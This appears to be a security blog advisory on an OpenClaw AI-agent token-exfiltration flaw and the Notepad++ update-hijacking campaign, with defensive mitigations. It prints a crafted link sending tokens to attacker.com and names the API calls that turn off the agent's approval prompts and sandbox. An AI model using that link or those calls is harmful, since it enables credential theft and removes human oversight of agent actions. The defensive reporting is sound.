CybersecurityFebruary 4, 2026

OpenClaw RCE and Notepad++ Supply Chain Attack: 2026 Threats

SI

Secured Intel Team

Editor

OpenClaw RCE and Notepad++ Supply Chain Attack: 2026 Threats

OpenClaw RCE and Notepad++ Supply Chain Attack: 2026 Threats

State-sponsored hackers maintained six-month access to Notepad++ update infrastructure while a critical one-click vulnerability in OpenClaw enabled complete gateway compromise through malicious links. These aren't isolated incidents—they represent a fundamental shift in how adversaries exploit trusted development tools that security professionals depend on daily.

CVE-2026-25253 affects OpenClaw (formerly Clawdbot and Moltbot), enabling attackers to exfiltrate authentication tokens through WebSocket origin validation failures and achieve remote code execution with CVSS score 8.8. Meanwhile, Chinese APT group Lotus Blossom compromised Notepad++ hosting infrastructure from June through December 2025, selectively targeting telecommunications and financial organizations in East Asia. Both attacks exploited infrastructure-level weaknesses rather than application code vulnerabilities.

This analysis examines verified technical details from primary sources including CVE databases, vendor advisories, and incident response reports. You'll understand how these attacks bypass traditional security controls and what immediate actions protect development environments.

The OpenClaw Token Exfiltration Vulnerability

WebSocket Origin Validation Failure

OpenClaw's Control UI accepts gatewayUrl parameters from query strings without validation, automatically initiating WebSocket connections that transmit stored gateway tokens. Security researcher Mav Levin from depthfirst discovered this logic flaw enables cross-site WebSocket hijacking (CSWSH) because the server fails to validate the Origin header in requests.

The attack chain executes in milliseconds. A victim clicking a crafted link like https://victim-ui/?gatewayUrl=wss://attacker.com/exfil triggers automatic token transmission to attacker-controlled servers. The stolen Bearer token grants operator-level access to the victim's local gateway API, enabling arbitrary configuration changes and privileged command execution.

Important: Even localhost-only OpenClaw instances remain vulnerable. The attack uses the victim's browser as a pivot point into the local network, bypassing the need for internet-facing exposure entirely.

Sandbox Escape Through API Manipulation

OpenClaw implements robust safety features including execution approval prompts and containerized sandboxes for dangerous operations. However, the stolen authentication token includes operator.admin and operator.approvals scopes, allowing attackers to disable these protections through API calls rather than exploiting sandbox implementation vulnerabilities.

Attackers send exec.approvals.set requests setting ask: ""off"" to eliminate user confirmation requirements. A subsequent config.patch request changes tools.exec.host to ""gateway"" forcing commands to execute directly on the host machine instead of inside Docker containers. This API-based bypass demonstrates how authentication compromise can render technical security controls irrelevant.

Attack Progression Analysis

StageTechnical ActionAttacker CapabilityDetection Opportunity
DeliveryVictim clicks malicious linkToken exfiltration initiatedEmail/web gateway inspection
CaptureWebSocket connection to attacker serverAuthentication token stolenNetwork traffic monitoring
HijackLegitimate API connection establishedFull gateway API access gainedAnomalous WebSocket origins
DisableSafety features removed via APISandbox escape, approval bypassAPI call pattern analysis
ExecuteArbitrary shell command invocationComplete host system controlProcess behavior monitoring

Impact Across User Profiles

Users granting OpenClaw ""god mode"" permissions face catastrophic impact. The AI agent holds keys to email, messaging platforms, and unrestricted local computer control. Over 100,000 developers trust OpenClaw with authentication to sensitive services including iMessage, WhatsApp, Slack, and development infrastructure.

Security researcher Peter Steinberger noted the vulnerability affects any deployment where users authenticated to the Control UI. Attackers inherit all permissions granted to the AI agent, including access to API keys, authentication tokens, source code repositories, and cloud infrastructure credentials stored in development environments.

The Notepad++ Infrastructure Compromise

Six-Month Persistence Through Hosting Provider

Chinese state-sponsored threat actors attributed to Lotus Blossom (also tracked as Raspberry Typhoon, Bilbug, Spring Dragon) compromised the shared hosting server for notepad-plus-plus.org beginning June 2025. The attack evolved through three distinct phases as defenders closed initial access vectors.

Phase one exploited an unpatched kernel vulnerability granting root access until September 2, 2025. After kernel patching eliminated server access, attackers maintained stolen credentials for internal services until December 2, 2025. This allowed continued redirection of Notepad++ update traffic to attacker-controlled servers serving malicious manifests.

The hosting provider confirmed attackers specifically searched for the notepad-plus-plus.org domain, suggesting prior knowledge of insufficient update verification controls in older Notepad++ versions. Traffic from targeted users was selectively redirected rather than broadly compromised, making detection significantly more difficult.

Selective Targeting and Custom Backdoors

Rapid7 researchers discovered the campaign deployed Chrysalis, a previously undocumented custom backdoor. Kaspersky identified three different infection chains rotating C2 servers, downloaders, and payloads monthly from July through October 2025. Approximately twelve machines were targeted across specific geographic and organizational profiles.

Confirmed victims included individuals in Vietnam, El Salvador, and Australia, plus organizations in the Philippines (government), El Salvador (financial services), and Vietnam (IT service provider). The targeting pattern focused on telecommunications and financial organizations with interests in East Asia.

Infection Chain Evolution

PeriodC2 InfrastructureDelivery MechanismTarget ProfilePayload Type
July 202545.76.155[.]202NSIS installerTaiwan organizationsSystem reconnaissance
Aug-Sep 2025Rotating IPsCustom downloadersVietnam IT providersChrysalis backdoor
Oct 2025temp[.]sh uploadsShell command chainsFinancial servicesData exfiltration
Nov-Dec 2025Maintained credentialsTraffic redirectionSelective targetingAccess preservation

Supply Chain Attack Methodology

Rather than compromising Notepad++ source code, attackers intercepted update traffic at the infrastructure layer. The legitimate updater (WinGUp) checked for updates at notepad-plus-plus.org/getDownloadUrl.php, which attackers redirected to malicious servers returning tampered update manifests pointing to attacker-controlled executables.

Security researcher Kevin Beaumont noted this attack pattern requires significant resources. Sitting inside the ISP chain to redirect traffic at scale indicates nation-state capabilities. The selective targeting—affecting only specific organizations rather than all Notepad++ users—demonstrates sophisticated operational security prioritizing intelligence collection over broad compromise detection.

Pro Tip: Analyze update traffic patterns in network logs. Legitimate Notepad++ updates come from verified domains with valid code signatures. Any redirects to unexpected IPs or domains downloading executables warrant immediate investigation.

Detection and Remediation Strategies

Immediate OpenClaw Mitigation

Update all OpenClaw instances to version 2026.1.29 or later released January 30, 2026. The patch adds gateway URL confirmation modals eliminating auto-connect behavior that enabled token exfiltration. All versions through 2026.1.24-1 contain the vulnerability and require immediate replacement.

Rotate all gateway authentication tokens after updating. Assume any tokens used while running vulnerable versions may have been exfiltrated. Generate new authToken values for every OpenClaw instance and revoke previously issued tokens.

Run OpenClaw with minimal permissions rather than ""god mode"" configurations. Limit agent access to specific tools and services required for intended functionality. Avoid granting unrestricted shell access, file system permissions, or cloud infrastructure API keys unless absolutely necessary for specific workflows.

Notepad++ Verification and Hardening

Download Notepad++ version 8.9.1 or later directly from the official website and install manually. This version includes WinGUp security enhancements verifying installer certificates and signatures. Version 8.9.2, expected in approximately one month, will enforce mandatory certificate signature verification.

Verify existing Notepad++ installations by comparing file hashes against official sources. Review process histories for suspicious executions of notepad++.exe spawning GUP.exe followed by unexpected update.exe or other unusual processes. Check for outbound connections to IPs outside normal update infrastructure.

Enterprise environments should consider blocking notepad-plus-plus.org at network boundaries or preventing gup.exe from internet access if centralized package management handles updates. Deploy robust monitoring for Notepad++ extension installations and unusual process behavior including shell command execution or external network connections.

Detection Indicators Comparison

ThreatNetwork IndicatorsProcess IndicatorsFile System IndicatorsTimeline
OpenClaw CVE-2026-25253WebSocket to unexpected origins, bearer tokens in transitConfig mutations, sandbox disables, unusual API callsGateway config changesMilliseconds
Notepad++ Supply ChainRedirects to non-standard update servers, temp[.]sh uploadsnotepad++.exe → GUP.exe → update.exe chainUnsigned or newly-signed executablesHours to days

Infrastructure Security Fundamentals

Both attacks succeeded through infrastructure-level compromise rather than application code vulnerabilities. The OpenClaw flaw existed in the Control UI's request handling logic. The Notepad++ breach occurred at the hosting provider level through shared server vulnerabilities and credential theft.

Implement defense-in-depth strategies assuming any single layer may fail. Code signing alone didn't prevent the Notepad++ attack because manifest manipulation occurred before signature validation. Network security controls complement application-level protections when perimeter defenses are bypassed.

Monitor authentication token usage patterns for anomalies. Multiple sessions from single credentials within short timeframes indicate potential exfiltration and unauthorized reuse. Implement token rotation policies limiting credential lifespan and enforcing periodic regeneration regardless of suspected compromise.

Broader Supply Chain Security Implications

Shared Hosting as Single Point of Failure

The Notepad++ incident validates concerns about shared hosting infrastructure for critical software distribution. One compromised server affected update integrity for millions of global users. Organizations distributing software through shared hosting require additional validation layers beyond standard code signing.

Notepad++ migrated to a new hosting provider with significantly stronger security practices following the incident. However, the six-month compromise period demonstrates detection challenges when attackers maintain operational security discipline. No indicators of compromise were found in 400GB of server logs analyzed during incident response.

Deploy independent verification mechanisms for all software updates. Hash checking against multiple independent sources catches manifest manipulation. Monitor update traffic for redirects to unexpected domains or IP addresses. Consider dedicated infrastructure for security-critical application distribution eliminating shared hosting risks.

The Evolution of Nation-State Tactics

Lotus Blossom's Notepad++ campaign demonstrates sophisticated persistence tactics characteristic of state-sponsored operations. Rather than smash-and-grab data theft, the six-month operation maintained long-term access through infrastructure compromise, credential persistence, and selective targeting avoiding widespread detection.

Monthly rotation of C2 servers, downloaders, and payloads shows adaptive adversary behavior responding to defensive measures. The deployment of custom backdoors like Chrysalis indicates significant development resources dedicated to this specific campaign.

How should organizations defend against adversaries willing to invest six months maintaining selective access to trusted software distribution channels? Traditional annual penetration testing misses persistent access established months earlier. Continuous validation of trust relationships, code integrity, and infrastructure security becomes essential.

Key Takeaways

  • Update OpenClaw to version 2026.1.29 immediately and rotate all authentication tokens to remediate CVE-2026-25253 enabling one-click remote code execution through WebSocket hijacking
  • Download Notepad++ version 8.9.1 or later manually from official sources and verify installation integrity through hash comparison against multiple independent sources
  • Implement network monitoring detecting WebSocket connections to unexpected origins and software update traffic redirects indicating infrastructure-level compromise attempts
  • Run AI agents and development tools with minimal permissions rather than unrestricted access, limiting blast radius when authentication tokens are exfiltrated
  • Migrate critical software distribution away from shared hosting infrastructure and deploy independent verification mechanisms beyond code signing alone
  • Establish continuous validation frameworks replacing annual assessments, as sophisticated adversaries maintain six-month persistence through infrastructure compromise and credential theft

Conclusion

The OpenClaw vulnerability and Notepad++ supply chain attack demonstrate how adversaries increasingly target development tool infrastructure and authentication mechanisms. CVE-2026-25253's one-click exploitation through token exfiltration and Lotus Blossom's six-month persistence through hosting provider compromise reveal security gaps in software developers rely on daily.

Patch known vulnerabilities immediately. Update OpenClaw and Notepad++ installations before attackers exploit remaining exposure windows. Implement verification layers catching infrastructure manipulation that code signing alone misses. Deploy monitoring detecting behavioral indicators when technical controls fail.

The attacks succeeded because traditional security models assume code vulnerabilities represent primary risk. Modern threats target infrastructure hosting software distribution, authentication token theft, and selective traffic interception. Organizations must implement defense-in-depth strategies assuming compromise and limiting blast radius when initial defenses fail. Start with immediate patching protecting against verified threats, then build frameworks preventing next-generation attack vectors.


Frequently Asked Questions

Q: How do I verify my OpenClaw installation isn't compromised by CVE-2026-25253?
A: Check your version through the admin console—any version before 2026.1.29 released January 30, 2026 contains the WebSocket origin validation vulnerability. After updating, review gateway logs for unusual WebSocket connections from unexpected origins and regenerate all authentication tokens. Analyze API call patterns for suspicious configuration changes disabling sandbox or approval settings.

Q: Can traditional antivirus detect the Notepad++ supply chain attack payloads?
A: Signature-based antivirus likely misses the Chrysalis backdoor since it's previously undocumented custom malware delivered through legitimate update mechanisms with valid initial code signatures. Behavioral detection and endpoint detection and response (EDR) solutions offer better protection by identifying suspicious post-installation activities like unusual process chains (notepad++.exe → GUP.exe → update.exe) and unexpected network connections. Verify installations by comparing file hashes against official Notepad++ sources.

Q: Why does the OpenClaw vulnerability affect localhost-only installations?
A: The attack uses the victim's browser as a pivot point into the local network through cross-site WebSocket hijacking. When the victim clicks a malicious link, their browser initiates the outbound WebSocket connection to the attacker's server, exfiltrating the authentication token. The attacker then uses that stolen token to connect to the victim's localhost OpenClaw instance directly, bypassing the need for the instance itself to be internet-facing.

Q: What makes the Notepad++ attack attribution to Lotus Blossom credible?
A: Multiple independent security researchers including Rapid7 and Kaspersky identified tactics, techniques, and procedures matching Lotus Blossom's historical operations. The deployment of custom backdoors like Chrysalis, selective targeting of telecommunications and financial organizations in East Asia, six-month persistence through infrastructure compromise, and monthly rotation of attack infrastructure all align with known Chinese state-sponsored APT patterns. The hosting provider confirmed attackers specifically searched for the notepad-plus-plus.org domain, suggesting prior intelligence gathering.

Q: Should development teams stop using AI agents like OpenClaw after this vulnerability?
A: The vulnerability has been patched in version 2026.1.29, and OpenClaw remains viable for teams implementing proper security controls. Run agents with minimal necessary permissions rather than ""god mode"" unrestricted access, deploy network monitoring for unusual WebSocket traffic, implement token rotation policies, and educate users about clicking suspicious links in development contexts. The security lesson isn't abandoning useful tools but implementing defense-in-depth strategies assuming any individual control may fail."